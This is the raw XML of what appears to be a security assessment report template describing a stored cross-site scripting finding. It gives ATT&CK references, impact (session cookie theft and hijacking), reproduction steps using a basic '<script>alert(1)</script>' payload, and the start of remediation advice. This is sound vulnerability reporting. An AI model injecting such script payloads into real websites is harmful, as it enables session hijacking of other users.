              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="450F8D95" w:rsidP="0D325B6E" w:rsidRDefault="450F8D95" w14:paraId="519D0CEA" w14:textId="6631924C">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Raa07d03b96e242bb">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="450F8D95">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1059</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5D2B0319">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>.007</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="450F8D95">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>: Command and Scripting Interpreter - JavaScript</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="6DA55E35" w:rsidP="0D325B6E" w:rsidRDefault="6DA55E35" w14:paraId="44A97C52" w14:textId="0D2697F5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rec3d344337cc4737">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6DA55E35">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1539: Steal Web Session Cookies</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="35A52EDF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="35A52EDF">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(Delete If Not Used)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3FC8B598">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25250E69"/>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D5C0DB8" w:rsidP="0D325B6E" w:rsidRDefault="7D5C0DB8" w14:paraId="32088A42" w14:textId="3FA38F6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7D5C0DB8">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A55F832" w:rsidP="0D325B6E" w:rsidRDefault="5A55F832" w14:paraId="6A1BA1D9" w14:textId="16DACDDB">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3f0d1e00b9c14df2">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5A55F832">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1021: Restrict Web Based Content</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="39BD098F" w:rsidP="0D325B6E" w:rsidRDefault="39BD098F" w14:paraId="53D19EF8" w14:textId="1012A451">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8e96246d28914d29">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="39BD098F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0818: Validate Program Inputs</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="502EDC7A">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13BF803" w14:textId="77078B4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9C434DF" w14:textId="792458D7">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C04E043" w14:textId="4D35A60B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3C52F381" w:rsidP="0D325B6E" w:rsidRDefault="3C52F381" w14:paraId="7114C9A6" w14:textId="2C01EFA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52F38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26B61EF" w:rsidP="0D325B6E" w:rsidRDefault="126B61EF" w14:paraId="30333B56" w14:textId="5A52975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6B61EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unsanitized</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="126B61EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> u</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ser input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is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stored o</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n the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server</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and is sent to the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client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as </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HTML w</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 xml:space="preserve">hen viewed, allowing an attacker to run arbitrary JavaScript code </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D27B58D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on the client</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BA7BCB5">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33437A1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This allows</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 xml:space="preserve"> an </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atta</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cke</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 xml:space="preserve"> to upl</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oad a malicious script a</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s user i</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np</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ut, whic</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7B366DA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B366DAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wh</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B366DAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>en</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rend</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red</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 xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7CE79596">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7CE79596">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nother user or APT Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7CE79596">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, will send the cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C1C2F38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the attacker, leading</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C1C2F38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to sess</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C1C2F38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ion hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0E688323" w14:textId="7CF8EAD5">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52F381" w:rsidP="0D325B6E" w:rsidRDefault="3C52F381" w14:paraId="2D02D4A2" w14:textId="3CCC371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52F38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216B8F8" w:rsidP="0D325B6E" w:rsidRDefault="3216B8F8" w14:paraId="4B9EF434" w14:textId="5AAD7DA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216B8F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This allow</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B24CC81">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3216B8F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a malicious actor to </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mani</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C595EE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pu</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late</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 xml:space="preserve"> other client sessions to </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render</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 xml:space="preserve"> Ja</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 xml:space="preserve">vaScript code that can be used to steal session cookies, </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render</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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B37529D">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519DC540">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ontrolled</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 xml:space="preserve"> HTML, </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and a</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48C97760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>er the functionality of the website for other users</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C9C188C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, leading to reputation damages and user account compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="25C9A259" w14:textId="7D76814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C52F381" w:rsidP="0D325B6E" w:rsidRDefault="3C52F381" w14:paraId="5F2EBEFF" w14:textId="216EE56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52F38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A425906" w:rsidP="0D325B6E" w:rsidRDefault="3A425906" w14:paraId="6D5CDE5A" w14:textId="57345E2C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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A425906">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7CF59C03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a post with the following payload &lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7CF59C03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7CF59C03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7CF59C03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B560E6E" w:rsidP="0D325B6E" w:rsidRDefault="1B560E6E" w14:paraId="77C203F4" w14:textId="37EB5D2A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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560E6E">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7CF59C03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>View the post</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="66E3D2E4" w14:textId="6F97128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52F381" w:rsidP="0D325B6E" w:rsidRDefault="3C52F381" w14:paraId="196D5FDB" w14:textId="66D69D0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52F381">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AAB74CB" w:rsidP="0D325B6E" w:rsidRDefault="2AAB74CB" w14:paraId="1E05F4AA" w14:textId="1440B1D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4CB">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AAB74C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9925865">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2AAB74CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ecommends</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2AAB74C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AAB74CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2AAB74CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e following</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="588458C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42834ECA" w:rsidP="0D325B6E" w:rsidRDefault="42834ECA" w14:paraId="48F2C363" w14:textId="03328F69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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2834ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42834ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>normalize</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42834ECA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
